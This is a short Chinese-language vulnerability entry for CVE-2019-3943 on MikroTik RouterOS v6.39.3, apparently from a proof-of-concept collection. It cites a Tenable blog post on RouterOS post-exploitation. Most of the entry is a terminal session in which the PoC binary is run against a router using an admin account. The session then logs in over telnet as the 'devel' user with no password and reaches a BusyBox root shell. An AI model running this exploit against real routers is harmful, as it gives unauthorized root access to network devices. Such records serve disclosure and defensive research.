验证方式：验证文章
文章链接：https://medium.com/tenable-techblog/routeros-post-exploitation-784c08044790
目标产品：MikroTik v6.39.3

poc用法：
albinolobster@ubuntu:~/routeros_internal/poc/cve_2019_3943_dev_shell/build$ ./cve_2019_3943_dev_shell -i 192.168.1.18 -u admin
Success!
albinolobster@ubuntu:~/routeros_internal/poc/cve_2019_3943_dev_shell/build$ telnet 192.168.1.18
Trying 192.168.1.18...
Connected to 192.168.1.18.
Escape character is '^]'.

MikroTik v6.39.3 (bugfix)
Login: devel
Password: 


BusyBox v1.00 (2017.10.10-07:06+0000) Built-in shell (ash)
Enter 'help' for a list of built-in commands.

# 